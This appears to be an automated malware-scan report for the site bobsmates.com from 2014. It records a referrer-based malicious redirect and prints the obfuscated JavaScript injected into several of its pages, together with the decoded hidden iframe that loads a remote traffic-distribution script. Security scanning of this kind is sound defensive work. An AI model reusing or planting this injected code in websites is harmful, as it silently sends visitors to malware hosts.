Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://bobsmates.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: bobsmates.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 20:42:25 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://bobsmates.com/ | 200 OK Content-Length: 3724 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function v51865d51c13ee(v51865d51c14ec){ function v51865d51c15ae () {var v51865d51c168f=16; return v51865d51c168f;} return(parseInt(v51865d51c14ec,v51865d51c15ae()));}
function v51865d51c177c(v51865d51c1855){ function v51865d51c1a8a () {return 2;} var v51865d51c1908='';for(v51865d51c19e5=0; v51865d51c19e5<v51865d51c1855.length; v51865d51c19e5+=v51865d51c1a8a()){ v51865d51c1908+=(String.fromCharCode(v51865d51c13ee(v51865d51c1855.substr(v51865d51c19e5, v51865d51c1a8a()))));}return v51865d51c1908;}
document.write(v51865d51c177c('3C696672616D65206E616D653D273861623727207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3930206865696768743D3431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));
Decoded script: <iframe name='8ab7' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=90 height=41 style='display:none'></iframe>
Antivirus reports:
http://bobsmates.com/includes/bmFunctions.js | 200 OK Content-Length: 6287 Content-Type: application/javascript | clean |
http://bobsmates.com/home.php | 200 OK Content-Length: 3738 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function v51865d4fa92f3(v51865d4fa9bc8){ function v51865d4fa9c5f () {return 16;} return(parseInt(v51865d4fa9bc8,v51865d4fa9c5f()));}
function v51865d4fa9d2e(v51865d4fa9d7b){ function v51865d4fa9fa3 () {return 2;} var v51865d4fa9dc5='';for(v51865d4fa9e0d=0; v51865d4fa9e0d<v51865d4fa9d7b.length; v51865d4fa9e0d+=v51865d4fa9fa3()){ v51865d4fa9dc5+=(String.fromCharCode(v51865d4fa92f3(v51865d4fa9d7b.substr(v51865d4fa9e0d, v51865d4fa9fa3()))));}return v51865d4fa9dc5;}
document.write(v51865d4fa9d2e('3C696672616D65206E616D653D2762656532396427207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333330206865696768743D353632207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));
Decoded script: <iframe name='bee29d' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=330 height=562 style='display:none'></iframe>
Antivirus reports:
http://bobsmates.com/curr_blurb.php | 200 OK Content-Length: 4728 Content-Type: text/html | clean |
http://bobsmates.com/discussion.php | 200 OK Content-Length: 49852 Content-Type: text/html | clean |
http://bobsmates.com/index.php | 200 OK Content-Length: 3724 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function v51865d51c13ee(v51865d51c14ec){ function v51865d51c15ae () {var v51865d51c168f=16; return v51865d51c168f;} return(parseInt(v51865d51c14ec,v51865d51c15ae()));}
function v51865d51c177c(v51865d51c1855){ function v51865d51c1a8a () {return 2;} var v51865d51c1908='';for(v51865d51c19e5=0; v51865d51c19e5<v51865d51c1855.length; v51865d51c19e5+=v51865d51c1a8a()){ v51865d51c1908+=(String.fromCharCode(v51865d51c13ee(v51865d51c1855.substr(v51865d51c19e5, v51865d51c1a8a()))));}return v51865d51c1908;}
document.write(v51865d51c177c('3C696672616D65206E616D653D273861623727207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3930206865696768743D3431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));
Decoded script: <iframe name='8ab7' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=90 height=41 style='display:none'></iframe>
Antivirus reports:
http://bobsmates.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 20 Sep 2014 20:42:27 GMT Location: http://BishopsWaltham.net/Backgrounds/Various/thumbs.php Server: Apache Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://bishopswaltham.net/backgrounds/various/thumbs.php | 500 Internal Server Error Content-Length: 163 | clean |
http://bishopswaltham.net/test404page.js | 404 Not Found Content-Length: 5214 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bobsmates.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bobsmates.com/
Result: bobsmates.com is not infected or malware details are not published yet.